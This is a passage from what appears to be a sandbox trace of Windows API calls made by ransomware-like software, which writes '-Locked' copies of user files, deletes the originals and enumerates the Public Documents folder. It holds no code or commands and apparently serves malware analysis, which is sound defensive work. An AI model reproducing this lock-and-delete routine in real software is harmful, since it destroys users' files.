lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\HarvardAnglia2008OfficeOnline.xsl", lpFilePart=0x0) returned 0x64 [0309.309] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\HarvardAnglia2008OfficeOnline.xsl" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\bibliography\\style\\harvardanglia2008officeonline.xsl")) returned 1 [0309.358] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\IEEE2006OfficeOnline.xsl-Locked", nBufferLength=0x105, lpBuffer=0x1aeab0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\IEEE2006OfficeOnline.xsl-Locked", lpFilePart=0x0) returned 0x62 [0309.358] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1aefa4) returned 1 [0309.358] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\IEEE2006OfficeOnline.xsl-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\bibliography\\style\\ieee2006officeonline.xsl-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x484 [0309.358] GetFileType (hFile=0x484) returned 0x1 [0309.358] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1aefa0) returned 1 [0309.358] GetFileType (hFile=0x484) returned 0x1 [0309.360] CloseHandle (hObject=0x484) returned 1 [0309.360] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\IEEE2006OfficeOnline.xsl", nBufferLength=0x105, lpBuffer=0x1aec30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\IEEE2006OfficeOnline.xsl", lpFilePart=0x0) returned 0x5b [0309.360] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\IEEE2006OfficeOnline.xsl" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\bibliography\\style\\ieee2006officeonline.xsl")) returned 1 [0309.361] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\ISO690.XSL-Locked", nBufferLength=0x105, lpBuffer=0x1aeab0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\ISO690.XSL-Locked", lpFilePart=0x0) returned 0x54 [0309.361] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1aefa4) returned 1 [0309.361] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\ISO690.XSL-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\bibliography\\style\\iso690.xsl-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x484 [0309.361] GetFileType (hFile=0x484) returned 0x1 [0309.361] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1aefa0) returned 1 [0309.361] GetFileType (hFile=0x484) returned 0x1 [0309.363] CloseHandle (hObject=0x484) returned 1 [0309.363] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\ISO690.XSL", nBufferLength=0x105, lpBuffer=0x1aec30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\ISO690.XSL", lpFilePart=0x0) returned 0x4d [0309.364] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\ISO690.XSL" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\bibliography\\style\\iso690.xsl")) returned 1 [0309.364] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\ISO690Nmerical.XSL-Locked", nBufferLength=0x105, lpBuffer=0x1aeab0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\ISO690Nmerical.XSL-Locked", lpFilePart=0x0) returned 0x5c [0309.364] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1aefa4) returned 1 [0309.364] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\ISO690Nmerical.XSL-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\bibliography\\style\\iso690nmerical.xsl-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x484 [0309.365] GetFileType (hFile=0x484) returned 0x1 [0309.365] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1aefa0) returned 1 [0309.365] GetFileType (hFile=0x484) returned 0x1 [0309.366] CloseHandle (hObject=0x484) returned 1 [0309.367] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\ISO690Nmerical.XSL", nBufferLength=0x105, lpBuffer=0x1aec30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\ISO690Nmerical.XSL", lpFilePart=0x0) returned 0x55 [0309.367] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\ISO690Nmerical.XSL" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\bibliography\\style\\iso690nmerical.xsl")) returned 1 [0309.368] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\MLASeventhEditionOfficeOnline.xsl-Locked", nBufferLength=0x105, lpBuffer=0x1aeab0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\MLASeventhEditionOfficeOnline.xsl-Locked", lpFilePart=0x0) returned 0x6b [0309.368] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1aefa4) returned 1 [0309.368] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\MLASeventhEditionOfficeOnline.xsl-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\bibliography\\style\\mlaseventheditionofficeonline.xsl-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x484 [0309.368] GetFileType (hFile=0x484) returned 0x1 [0309.368] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1aefa0) returned 1 [0309.368] GetFileType (hFile=0x484) returned 0x1 [0309.370] CloseHandle (hObject=0x484) returned 1 [0309.376] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\MLASeventhEditionOfficeOnline.xsl", nBufferLength=0x105, lpBuffer=0x1aec30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\MLASeventhEditionOfficeOnline.xsl", lpFilePart=0x0) returned 0x64 [0309.376] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\MLASeventhEditionOfficeOnline.xsl" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\bibliography\\style\\mlaseventheditionofficeonline.xsl")) returned 1 [0309.440] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\SIST02.XSL-Locked", nBufferLength=0x105, lpBuffer=0x1aeab0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\SIST02.XSL-Locked", lpFilePart=0x0) returned 0x54 [0309.440] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1aefa4) returned 1 [0309.440] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\SIST02.XSL-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\bibliography\\style\\sist02.xsl-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x484 [0309.440] GetFileType (hFile=0x484) returned 0x1 [0309.440] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1aefa0) returned 1 [0309.441] GetFileType (hFile=0x484) returned 0x1 [0309.442] CloseHandle (hObject=0x484) returned 1 [0309.442] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\SIST02.XSL", nBufferLength=0x105, lpBuffer=0x1aec30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\SIST02.XSL", lpFilePart=0x0) returned 0x4d [0309.442] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\SIST02.XSL" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\bibliography\\style\\sist02.xsl")) returned 1 [0309.443] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\TURABIAN.XSL-Locked", nBufferLength=0x105, lpBuffer=0x1aeab0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\TURABIAN.XSL-Locked", lpFilePart=0x0) returned 0x56 [0309.443] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1aefa4) returned 1 [0309.443] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\TURABIAN.XSL-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\bibliography\\style\\turabian.xsl-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x484 [0309.443] GetFileType (hFile=0x484) returned 0x1 [0309.443] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1aefa0) returned 1 [0309.443] GetFileType (hFile=0x484) returned 0x1 [0309.445] CloseHandle (hObject=0x484) returned 1 [0309.447] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\TURABIAN.XSL", nBufferLength=0x105, lpBuffer=0x1aec30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\TURABIAN.XSL", lpFilePart=0x0) returned 0x4f [0309.448] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\TURABIAN.XSL" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\bibliography\\style\\turabian.xsl")) returned 1 [0309.522] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style", nBufferLength=0x105, lpBuffer=0x1aec84, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style", lpFilePart=0x0) returned 0x42 [0309.522] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af0d0) returned 1 [0309.522] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\bibliography\\style"), fInfoLevelId=0x0, lpFileInformation=0x1af150 | out: lpFileInformation=0x1af150*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80e9aa3d, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x38d795a5, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x38d795a5, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0309.523] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0cc) returned 1 [0309.523] RemoveDirectoryW (lpPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\bibliography\\style")) returned 0 [0309.524] CoTaskMemAlloc (cb=0x404) returned 0x73f0b8 [0309.524] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x91, dwLanguageId=0x0, lpBuffer=0x73f0b8, nSize=0x200, Arguments=0x0 | out: lpBuffer="The directory is not empty.\r\n") returned 0x1d [0309.524] CoTaskMemFree (pv=0x73f0b8) [0309.526] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography", nBufferLength=0x105, lpBuffer=0x1aeccc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography", lpFilePart=0x0) returned 0x3c [0309.526] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af118) returned 1 [0309.527] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\bibliography"), fInfoLevelId=0x0, lpFileInformation=0x1af198 | out: lpFileInformation=0x1af198*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80e898ff, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x80e9aa3d, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x80e9aa3d, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0309.527] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af114) returned 1 [0309.527] RemoveDirectoryW (lpPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\bibliography")) returned 0 [0309.527] CoTaskMemAlloc (cb=0x404) returned 0x73f0b8 [0309.527] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x91, dwLanguageId=0x0, lpBuffer=0x73f0b8, nSize=0x200, Arguments=0x0 | out: lpBuffer="The directory is not empty.\r\n") returned 0x1d [0309.528] CoTaskMemFree (pv=0x73f0b8) [0309.529] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft", nBufferLength=0x105, lpBuffer=0x1aed14, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft", lpFilePart=0x0) returned 0x2f [0309.529] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af160) returned 1 [0309.529] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft"), fInfoLevelId=0x0, lpFileInformation=0x1af1e0 | out: lpFileInformation=0x1af1e0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x38a4a7db, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x38a4a7db, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0309.529] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af15c) returned 1 [0309.529] RemoveDirectoryW (lpPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft")) returned 0 [0309.530] CoTaskMemAlloc (cb=0x404) returned 0x73f0b8 [0309.530] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x91, dwLanguageId=0x0, lpBuffer=0x73f0b8, nSize=0x200, Arguments=0x0 | out: lpBuffer="The directory is not empty.\r\n") returned 0x1d [0309.530] CoTaskMemFree (pv=0x73f0b8) [0309.533] CoTaskMemAlloc (cb=0x20c) returned 0x6c7110 [0309.533] SHGetFolderPathW (in: hwnd=0x0, csidl=46, hToken=0x0, dwFlags=0x0, pszPath=0x6c7110 | out: pszPath="C:\\Users\\Public\\Documents") returned 0x0 [0309.536] CoTaskMemFree (pv=0x6c7110) [0309.536] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Documents", nBufferLength=0x105, lpBuffer=0x1aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Documents", lpFilePart=0x0) returned 0x19 [0309.536] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af1d0) returned 1 [0309.536] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Documents", nBufferLength=0x105, lpBuffer=0x1aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Documents", lpFilePart=0x0) returned 0x19 [0309.536] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Documents\\", nBufferLength=0x105, lpBuffer=0x1aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Documents\\", lpFilePart=0x0) returned 0x1a [0309.537] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Documents\\*", lpFindFileData=0x1aeef8 | out: lpFindFileData=0x1aeef8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x5d5bfea2, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5d5bfea2, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0309.639] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x5d5bfea2, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5d5bfea2, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0309.640] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x37f05f6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97421a72, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97421a72, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x116, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0309.640] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x5d599f22, ftCreationTime.dwHighDateTime=0x1d7005f, ftLastAccessTime.dwLowDateTime=0x5d599f22, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5d599f22, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Music", cAlternateFileName="MYMUSI~1")) returned 1 [0309.640] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x5d599f22, ftCreationTime.dwHighDateTime=0x1d7005f, ftLastAccessTime.dwLowDateTime=0x5d599f22, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5d599f22, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Pictures", cAlternateFileName="MYPICT~1")) returned 1 [0309.640] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x5d5bfea2, ftCreationTime.dwHighDateTime=0x1d7005f, ftLastAccessTime.dwLowDateTime=0x5d5bfea2, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5d5bfea2, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 1 [0309.640] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x5d5bfea2, ftCreationTime.dwHighDateTime=0x1d7005f, ftLastAccessTime.dwLowDateTime=0x5d5bfea2, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5d5bfea2, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 0 [0309.641] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0309.641] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af190) returned 1 [0309.642] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af19c) returned 1 [0309.642] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af1d0) returned 1 [0309.642] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Documents", nBufferLength=0x105, lpBuffer=0x1aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Documents", lpFilePart=0x0) returned 0x19 [0309.642] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Documents\\", nBufferLength=0x105, lpBuffer=0x1aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Documents\\", lpFilePart=0x0) returned 0x1a [0309.642] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Documents\\*", lpFindFileData=0x1aeef8 | out: lpFindFileData=0x1aeef8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x5d5bfea2, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5d5bfea2, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0309.643] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x5d5bfea2, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5d5bfea2, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0309.643] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x37f05f6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97421a72, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97421a72, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x116, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0309.643] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x5d599f22, ftCreationTime.dwHighDateTime=0x1d7005f, ftLastAccessTime.dwLowDateTime=0x5d599f22, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5d599f22, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Music", cAlternateFileName="MYMUSI~1")) returned 1 [0309.644] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x5d599f22, ftCreationTime.dwHighDateTime=0x1d7005f, ftLastAccessTime.dwLowDateTime=0x5d599f22, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5d599f22, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Pictures", cAlternateFileName="MYPICT~1")) returned 1 [0309.644] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x5d5bfea2, ftCreationTime.dwHighDateTime=0x1d7005f, ftLastAccessTime.dwLowDateTime=0x5d5bfea2, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5d5bfea2, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 1 [0309.644] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0309.644] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0309.645] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af190) returned 1 [0309.645] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af19c) returned 1 [0309.645] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Documents\\desktop.ini-Locked", nBufferLength=0x105, lpBuffer=0x1aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Documents\\desktop.ini-Locked", lpFilePart=0x0) returned 0x2c [0309.645] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af07c) returned 1 [0309.645] CreateFileW 